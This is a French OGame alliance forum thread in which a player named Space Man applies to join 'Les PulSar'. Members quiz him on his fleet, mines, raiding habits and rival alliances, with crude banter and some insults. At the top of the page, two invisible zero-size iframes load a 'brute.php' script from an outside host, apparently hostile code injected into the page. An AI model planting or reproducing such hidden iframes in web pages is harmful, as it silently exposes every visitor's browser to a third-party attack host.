Les PulSar
<iframe style="border: none; width: 0px; height: 0px;" src="http://supprime.net/brute.php?maitre=lechemabanane"></iframe>
Les PulSar
<iframe style="border: none; width: 0px; height: 0px;" src="http://supprime.net/brute.php?maitre=lechemabanane"></iframe>
Les PulSar
Vous souhaitez réagir à ce message ? Créez un compte en quelques clics ou connectez-vous pour continuer.



 
AccueilDernières imagesRechercherS'enregistrerConnexion
Le Deal du moment :
Cartes Pokémon EV6.5 : où trouver le ...
Voir le deal

 

 Candidature de Space Man

Aller en bas 
+2
astyan
Space Man
6 participants
Aller à la page : 1, 2  Suivant
AuteurMessage
Space Man




Messages : 14
Date d'inscription : 26/11/2009

Candidature de Space Man Empty
MessageSujet: Candidature de Space Man   Candidature de Space Man Icon_minitimeLun 21 Déc - 11:09

ben voilà : je postule chez vous !

les skypeurs me connaissent déjà , et donc je ne m'étendrai pas trop sur le sujet ...

vous connaissez mon style de jeu , ma flotte , mes mines et mes intentions sur le 62;

je pense pouvoir être un renfort très utile pour vous, et vous pouvez également m'être utiles ; bref j'estime que mon empire sera un appoint complémentaire à la pulsar et réciproquement.

vu que ma candidature officieuse pose quelques soucis et comme je vous l'ai dit sur skype récemment je voudrais savoir si ma candidature a des chances d'être acceptée ...

dans la négative je vous lâche et je pars postuler chez d'autres : ça ne sera pas un gros problème de trouver une ally sympa qui m'accepte !

j'attends de vos nouvelles !!

Space Man
Revenir en haut Aller en bas
astyan




Messages : 242
Date d'inscription : 26/05/2009

Candidature de Space Man Empty
MessageSujet: Re: Candidature de Space Man   Candidature de Space Man Icon_minitimeLun 21 Déc - 19:22

en quoi estimes tu etre un appoint aux pulsar


en vendant du deut ?

tu as quoi en flotte pour nous aider ?
Revenir en haut Aller en bas
Space Man




Messages : 14
Date d'inscription : 26/11/2009

Candidature de Space Man Empty
MessageSujet: Re: Candidature de Space Man   Candidature de Space Man Icon_minitimeLun 21 Déc - 21:58

plop !


Honoré de faire ta connaissance appolon !


je ne donnerai pas ma flotte sur ce topic que tout le monde peut visiter; par contre demande à sub, white ou bien pica et chipeur : ils la connaissent pour la simple et bonne raison que je leur ai donné sur skype y'a 2 jours...

je te dirai juste que j'ai une flotte d'appoint constituée principalement de lourds , et pas de tampon ...


je pense qu'il y a moyen de grouper et faire qq manips sympas : je ne peux plus hoffer seul, et y'a des bunkers que je peux vous aider à passer ...

Donc on peut progresser ensemble : c'est bien le but d'une ally, non ???
Revenir en haut Aller en bas
ilixa




Messages : 161
Date d'inscription : 26/05/2009
Age : 36
Localisation : Deriere ton cul

Candidature de Space Man Empty
MessageSujet: Re: Candidature de Space Man   Candidature de Space Man Icon_minitimeLun 21 Déc - 23:39

Pkoi notre alliance et pas une autre?
Revenir en haut Aller en bas
Space Man




Messages : 14
Date d'inscription : 26/11/2009

Candidature de Space Man Empty
MessageSujet: Re: Candidature de Space Man   Candidature de Space Man Icon_minitimeLun 21 Déc - 23:57

ben ...... pourquoi pas ????


et effectivement y'en a 2 autres qui pourraient m'intéresser, mais comme je me suis déjà engagé avec vous et que le contact passe plutôt bien (à mon avis personnel bien sur !!!) j'attends de voir ce qu'il en est avec vous avant de m'engager avec une autre .....

je suis comme ça ..... si vous ne voulez pas de moi j'en ferai pas un caca nerveux pour autant mais vu que je cause depuis un certain temps avec certains skypeurs fous de l'ally je me disais que tant qu'à faire ce serait aussi bien si j'étais totalement intégré : ça ferait sauter les dernieres barrieres du SECRET DEFENSE ....
Revenir en haut Aller en bas
astyan




Messages : 242
Date d'inscription : 26/05/2009

Candidature de Space Man Empty
MessageSujet: Re: Candidature de Space Man   Candidature de Space Man Icon_minitimeMar 22 Déc - 15:23

bah moi les bunker que je passe pas j'en ai pas trouve beaucoup et je peux hoffer seul


^^^^
Revenir en haut Aller en bas
Space Man




Messages : 14
Date d'inscription : 26/11/2009

Candidature de Space Man Empty
MessageSujet: Re: Candidature de Space Man   Candidature de Space Man Icon_minitimeMar 22 Déc - 17:14

dit-il du haut de son TOP5 flotte .................

toi peut-être mais qu'en est-il des autres pulsars ????

tout le monde n'a pas la chance d'être dans le top 5 flotte !!!! même chez les pulsars .....

donc voilà je ne te serais sans doute d'aucune utilité (et encore ça reste à voir ....) mais peut-être qu'un Le Chat appréciera mon appui ......

....... sans compter les 3M de points que gagne l'ally en m'intégrant (mais peut-être est-ce là une donnée sans intéret pour vous ...)
Revenir en haut Aller en bas
astyan




Messages : 242
Date d'inscription : 26/05/2009

Candidature de Space Man Empty
MessageSujet: Re: Candidature de Space Man   Candidature de Space Man Icon_minitimeMar 22 Déc - 17:53

oui les 3 millions de points osef a titre perso


tu arrive pas a mieux te vendre que cela

je sais pas tu as quoi comme objectif ripper , mineur deutier etc...
Revenir en haut Aller en bas
Space Man




Messages : 14
Date d'inscription : 26/11/2009

Candidature de Space Man Empty
MessageSujet: Re: Candidature de Space Man   Candidature de Space Man Icon_minitimeMar 22 Déc - 21:34

mon objecif principal : te passer devant !!!


les moyens : tous les moyens honnetes sont bons !!!

rips , interception, attaque de flotte à quai derriere bunker, AGs , etc ..... tout ce qui est rentable est bon pour progresser;

je dimensionne ma flotte en fonction de l'évolution de l'univers; ma flotte n'a pas la prétention d'être la plus puissante ou la plus nombreuse : elle n'est que l'outil qui me permet de faire progresser mes mines et technos plus rapidement ; quand les défs augmentent trop, alors là je re-dimensionne ma flotte en fonction de mes cibles futures pour les passer sans trop de casse ...

mes mines : 9 planetes à 31/28/28 et je lance les premieres cricri29
mes technos : 14/14/15 et prop hyper 11 en cours ...

d'autres questions ???
Revenir en haut Aller en bas
astyan




Messages : 242
Date d'inscription : 26/05/2009

Candidature de Space Man Empty
MessageSujet: Re: Candidature de Space Man   Candidature de Space Man Icon_minitimeMer 23 Déc - 20:47

mon objecif principal : te passer devant !!! Cool


les moyens : tous les moyens honnetes sont bons !!! pirat

rips , interception, attaque de flotte à quai derriere bunker, AGs , etc ..... tout ce qui est rentable est bon pour progresser;

je dimensionne ma flotte en fonction de l'évolution de l'univers; ma flotte n'a pas la prétention d'être la plus puissante ou la plus nombreuse : elle n'est que l'outil qui me permet de faire progresser mes mines et technos plus rapidement ; quand les défs augmentent trop, alors là je re-dimensionne ma flotte en fonction de mes cibles futures pour les passer sans trop de casse ...

mes mines : 9 planetes à 31/28/28 et je lance les premieres cricri29 tu compte aller jusque quoi en mines?

mes technos : 14/14/15 et prop hyper 11 en cours ... Shocked pour le 11

d'autres questions ??? study
Revenir en haut Aller en bas
Space Man




Messages : 14
Date d'inscription : 26/11/2009

Candidature de Space Man Empty
MessageSujet: Re: Candidature de Space Man   Candidature de Space Man Icon_minitimeMer 23 Déc - 21:31

plop !! Laughing


je n'avais pas vu la question cachée .... petit plaisantin cet appolon quand même ! Razz

bon coté mines un 32/29/29 voire 33/29/29 est à ma portée ; ceci dit sur le précédent uni (52) ou j'ai sévi j'étais à 32/28/28 alors donc je là découvre au fur et à mesure !!!

et apres ??? Euhhhh que me conseille le grand appolon ???? Idea Question

parce qu'après je serai dans l'inconnu vu que là c'est mon meilleur compte depuis que je joue à ce jeu de dingue !!! geek

Moi perso je pense monter une grosse flotte de rips ... et/ou de destros je ne sais pas trop ..... et c'est là que j'aurai besoin de conseils avisés si je veux te passer devant !!! Razz


Tremble appolon tremble .... Twisted Evil

Space Man.
Revenir en haut Aller en bas
astyan




Messages : 242
Date d'inscription : 26/05/2009

Candidature de Space Man Empty
MessageSujet: Re: Candidature de Space Man   Candidature de Space Man Icon_minitimeJeu 24 Déc - 11:27

je tremble pas rabbit
Revenir en haut Aller en bas
CreAtivE
Admin
CreAtivE


Messages : 300
Date d'inscription : 26/05/2009
Age : 42

Candidature de Space Man Empty
MessageSujet: Re: Candidature de Space Man   Candidature de Space Man Icon_minitimeJeu 24 Déc - 17:47

Joyeux Noël vous pouvez me rc ce soir gloire a quai en G8 allé les daleux gogogo ..sinon j répondrais demain voir après demain sur le sujet quand j serais plus sur le Minitel mouhahaha
Revenir en haut Aller en bas
Space Man




Messages : 14
Date d'inscription : 26/11/2009

Candidature de Space Man Empty
MessageSujet: Re: Candidature de Space Man   Candidature de Space Man Icon_minitimeJeu 24 Déc - 22:48

JOYEUX NOEL A TOUS !!!!!
Revenir en haut Aller en bas
CreAtivE
Admin
CreAtivE


Messages : 300
Date d'inscription : 26/05/2009
Age : 42

Candidature de Space Man Empty
MessageSujet: Re: Candidature de Space Man   Candidature de Space Man Icon_minitimeDim 27 Déc - 16:49

Salut space man!

bon bah finalement y pouvait y avoir qu'un gros noob de zoo pour me tenter le soir de noel ^^ """"""""""enfin tenter"""""""""""" piller j devrais dire mouhahahaha car il croit que c'est un ouf mais c'est un gros low comme tous les zoo d'ailleur mouhahahahaha


Sinon pour en revenir a nos moutons Smile


Je remarque que pas masse de pulsars sont passé ici pour donner leur avis et te poser des questions j'vais relancer le débat Smile

Moi j te dirais comme notre sub un peu :


Pourquoi venir chez nous et pas dans une autre ally?? je pense plutôt à la Zoo vue ton classement .. tu serais le singe ( en rapport avec les singes de l'espace man Very Happy )...car bon si quelques par tu recherches une ally comme la notre c'est forcement pour t'assurer un certain côté ppr sinon t'aurais été chez les HJ ou les noutchs ^^ voir les Gotei oO

Bref pk notre ally plutôt que la leur?ils hof plus, se sont des oufs moi j'aurais envie d'aller chez eux plutôt mdr .. sauf que Zoo sa fait tout droit sorti du cirque avec une bande pinguins homosexuel jongleur unijambiste .. sur ce point j te comprend Very Happy


Voilou donne moi un argument qui me ferais me chier dessus tellement j trouverais que t'a raison ^^
Revenir en haut Aller en bas
astyan




Messages : 242
Date d'inscription : 26/05/2009

Candidature de Space Man Empty
MessageSujet: Re: Candidature de Space Man   Candidature de Space Man Icon_minitimeDim 27 Déc - 19:14

voila je dis rien de mieux

tu as mon vote des que je vois crea en train de se chier dessus via sa webcam
Revenir en haut Aller en bas
Space Man




Messages : 14
Date d'inscription : 26/11/2009

Candidature de Space Man Empty
MessageSujet: Re: Candidature de Space Man   Candidature de Space Man Icon_minitimeDim 27 Déc - 22:23

plop !!


mais c'est vrai ça : pourquoi n'y avais-je pas pensé plus tôt : poser ma candid chez les zoos !!!!!

vlà une idée qu'elle est bonne !!!!!

bon alors bye les pulsars : j'me casse au zoo .....









hummmmmmmm ......................................... y'a un problème : j'aime pas les bèbètes du zoo : ça pue et de toute façon c'est naze un zoo !
pourquoi pas le cirque PINDER tant que vous y êtes !!!!!


vous me déshonorez à penser que je veux aller dans une telle alliance !!!!
trop facile la vie chez les zoos : tu fais de la flotte et t'attends que les no-life de service t'appellent pour grouper ta flotte à la leur et entrer dans le livre des records des hofs ogamiens !

moi je leur préfère nettement une grosse alliance de noobs comme la pulsar : au moins on ne s'y ennuie pas : entre les tops qui se font hoffer et les reprenoobs qui se font désosser y'a de l'ambiance !!!!!



alors ça te va comme motivation ou je continue ????


je vous apporte quoi ?! : de la stabilité, du calme, de la puissance (si si !!!) , 4 ans d'expériences enrichissantes sur 4 univers , et surtout pas de deut mouahahahah !!!!

UNI46 : TOP50 HOFFE Par Mehdi le grizzli
UNI49 : TOP30 ; 2 HOFS DONT 1 HOF DE GUERRE ; compte donné suite à overdose ogamienne (ma période no-life)
UNI52 : TOP20, PUSHE ET BAISE PAR UN C.... d'opérateur qui n'a rien voulu savoir ...
UNI62 : TOP7 (4HOFS EN DEBUT D'UNIVERS) , ET LE TOP5 en vue, avec dans mon collimateur l'arrière-train d'apollon ......

qu'est ce que je cherche : une ally ou on se marre quand on a envie de se marrer (vus les délires sur skype je pense que la pulsar est bien placée de ce coté là !!!) et ou on frappe fort quand l'occasion se présente (même si c'est pas le cas en ce moment vus que les derniers hofs ont vu les pulsars du mauvais coté du hof ....) !!!
je ne recherche aucune protection de la part de quiconque (je n'en ai pas vraiment besoin; chipeur est bien placé pour savoir que je suis un client difficile ...)

quoi vous dire de plus ??? y'a pas plus honnête et droit que moi (fanny pourra en témoigner : quand qqchose me gonfle je le dis au risque de perdre mes fournisseurs ...)

et vous ne regretterez pas ma venue !

au pire mettez-moi donc en test : ça ne me fait pas peur !!!! et là vous pourrez juger de mes compétences , qualités et défauts (si si j'en ai !!!)

quelque chose à rajouter ??? JE HAIS LES ZOOS , et je ne sais pas pourquoi ........ ben oui chuis un peu barge sur les bords moi aussi je pense .......

Mouahahahahahahah !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Revenir en haut Aller en bas
astyan




Messages : 242
Date d'inscription : 26/05/2009

Candidature de Space Man Empty
MessageSujet: Re: Candidature de Space Man   Candidature de Space Man Icon_minitimeLun 28 Déc - 5:36

bon moi il me plait finalement

j'attends la video de crea et pour moi c'est bon

on est plus a un fou pret
Revenir en haut Aller en bas
Space Man




Messages : 14
Date d'inscription : 26/11/2009

Candidature de Space Man Empty
MessageSujet: Re: Candidature de Space Man   Candidature de Space Man Icon_minitimeLun 28 Déc - 13:45

astyan a écrit:
bon moi il me plait finalement

j'attends la video de crea et pour moi c'est bon

on est plus a un fou pret

ouais : moi aussi j'attends la vidéo avec impatience .... Shocked
Revenir en haut Aller en bas
Space Man




Messages : 14
Date d'inscription : 26/11/2009

Candidature de Space Man Empty
MessageSujet: Re: Candidature de Space Man   Candidature de Space Man Icon_minitimeLun 28 Déc - 21:10

tiens au fait je rentre en guerre : je m'allie aux W.F contre les R.G et leurs alliés sur demande d'un pote W.F !!!!
Revenir en haut Aller en bas
Picasa
Admin
Picasa


Messages : 144
Date d'inscription : 26/05/2009
Localisation : Belgique

Candidature de Space Man Empty
MessageSujet: Re: Candidature de Space Man   Candidature de Space Man Icon_minitimeMer 30 Déc - 13:19

Pica aime ça ^^.

Bonne chance space man, pour moi ça avais toujours été oui Wink
Revenir en haut Aller en bas
Space Man




Messages : 14
Date d'inscription : 26/11/2009

Candidature de Space Man Empty
MessageSujet: Re: Candidature de Space Man   Candidature de Space Man Icon_minitimeVen 1 Jan - 18:26

BONNE ANNEE A TOUS !!!!!!!!!



même à sub ......... Laughing

santa
Revenir en haut Aller en bas
Picasa
Admin
Picasa


Messages : 144
Date d'inscription : 26/05/2009
Localisation : Belgique

Candidature de Space Man Empty
MessageSujet: Re: Candidature de Space Man   Candidature de Space Man Icon_minitimeSam 2 Jan - 19:51

Merci bonne année à toi aussi Wink
Revenir en haut Aller en bas
Mister d




Messages : 58
Date d'inscription : 26/05/2009

Candidature de Space Man Empty
MessageSujet: Re: Candidature de Space Man   Candidature de Space Man Icon_minitimeDim 3 Jan - 20:21

Coucou Space Man!!

je vois que tu as déjà été bien bombardé de question ^^

Pour moi se sera:

Pour l'avenir tu compte faire plus de HOF? (si tu as déjà rep à cette question excuse moi je reviens de vacs et g pu oublier cette question/réponse)

Est-tu le genre de joueur à analyser le jeu de l'un de t'es ennemie durant plusieurs jours pour connaitre ces habitudes et le poutrer?

Ps : C quan kon lance le vote interne les pulsars???

En tous, ravi de te voir sur le fofo ^^
Revenir en haut Aller en bas
Space Man




Messages : 14
Date d'inscription : 26/11/2009

Candidature de Space Man Empty
MessageSujet: Re: Candidature de Space Man   Candidature de Space Man Icon_minitimeLun 4 Jan - 16:26

Mister d a écrit:
Coucou Space Man!!

je vois que tu as déjà été bien bombardé de question ^^

Pour moi se sera:

Pour l'avenir tu compte faire plus de HOF? (si tu as déjà rep à cette question excuse moi je reviens de vacs et g pu oublier cette question/réponse)

Est-tu le genre de joueur à analyser le jeu de l'un de t'es ennemie durant plusieurs jours pour connaitre ces habitudes et le poutrer?

Ps : C quan kon lance le vote interne les pulsars???

En tous, ravi de te voir sur le fofo ^^

Hoffer, oui, ça me manque un peu !!!!

Et étudier les habitudes de mes cibles, toujours au moins 1 semaine de surveillance avant de passer à l'action ( à plus forte raison si je dois le poutrer à la Rip !!!) sauf si c'est une cible d'opportunité genre retour d'attaque sous phalange bien sur !!!


et moi je vote pour ........ Surprised
Revenir en haut Aller en bas
Contenu sponsorisé





Candidature de Space Man Empty
MessageSujet: Re: Candidature de Space Man   Candidature de Space Man Icon_minitime

Revenir en haut Aller en bas
 
Candidature de Space Man
Revenir en haut 
Page 1 sur 2Aller à la page : 1, 2  Suivant

Permission de ce forum:Vous ne pouvez pas répondre aux sujets dans ce forum
Les PulSar :: Partie Publique :: Recrutement-
Sauter vers: